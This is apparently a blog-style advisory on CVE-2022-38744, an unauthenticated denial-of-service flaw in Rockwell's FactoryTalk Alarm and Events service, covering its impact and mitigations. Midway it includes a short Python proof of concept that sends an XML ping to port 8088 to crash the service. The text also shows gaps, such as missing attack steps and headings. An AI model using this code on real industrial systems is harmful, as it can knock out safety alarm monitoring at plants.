CVE-2022-38744 - How a Simple Network Connection Can Crash Rockwell’s FactoryTalk Alarm and Events (FTAE) Service

Rockwell Automation’s FactoryTalk Alarm and Events (FTAE) is used for monitoring and managing alarms in industrial settings. It’s a key part of many critical infrastructure setups—but, as discovered in 2022, a flaw (CVE-2022-38744) allows anyone on the network to crash this service entirely, with no login required.

In this article, I’ll explain what this vulnerability is, how it works, its impact, and offer some example code for security researchers and defenders. Everything here is written simply and exclusively for this guide.

What Is CVE-2022-38744?

CVE-2022-38744 is an unauthenticated Denial of Service (DoS) vulnerability found in Rockwell’s FactoryTalk Alarm and Events Service (FTAE). An attacker with network access to the FTAE service can send a carefully crafted or even empty connection to a specific port. When the server gets this, it faults (crashes) and is no longer available—meaning alarms can’t be monitored until the service is restarted.

How Does the Attack Work?

The factory server exposes a TCP port, often used for “pings”—basically, a quick way to check if the service is alive. This port expects messages in an XML format. The vulnerability lies in how FTAE processes these incoming XML messages, or even just the network connection itself.

Service attempts to process it and fails—resulting in a crash.

That’s it. After this, FTAE is offline until manually brought back up.

Example Exploit Code

Here’s a simple Python snippet to demonstrate how this vulnerability could be triggered. Use legally and only in a lab environment!

import socket

target_ip = '192.168.1.10'  # Change to the target FTAE server IP
target_port = 8088          # Change if needed

# Example, maliciously malformed minimal XML message
xml_payload = b'<ping></ping>'

with socket.create_connection((target_ip, target_port), timeout=5) as s:
    s.sendall(xml_payload)
    print("Sent message—service should now be checked for crash.")

Note: In some setups, even establishing the connection and sending zero bytes can cause the crash.

Impact: Why Is This a Big Deal?

If an attacker (or any user) can shut down alarm monitoring in a factory or power plant, it could lead to safety incidents or process failures. Even if no damage occurs, downtime can cost millions for large plants.

Since authentication isn’t needed, anyone on the network can do this—if, for example, they connect via WiFi, VPN, or a poorly segmented network. The biggest risk is from insiders or attackers who have already breached the IT network.

Update to the latest patches for FactoryTalk Alarm and Events.

- Restrict network access to the affected port (default is 8088/TCP), using firewalls or VLANs.

Use proper network segmentation so only trusted systems can reach FTAE ports.

References:  
- Rockwell Automation Security Advisory  
- CISA Advisory

Closing Thoughts

CVE-2022-38744 is a reminder that industrial software isn’t immune to classic mistakes—like not handling input well on a public port. A single message on the wire can take down your alarms if you haven’t patched and secured your network.

If you use Rockwell FTAE, check your setup and patch as soon as possible. And remember: in OT networks, service denials aren’t just annoying—they can be dangerous.

Stay safe, stay patched!

*This article is exclusive. For further questions, reach out or see the official Rockwell and CISA links above for more detail.*

Timeline

Published on: 10/27/2022 14:15:00 UTC
Last modified on: 10/31/2022 13:21:00 UTC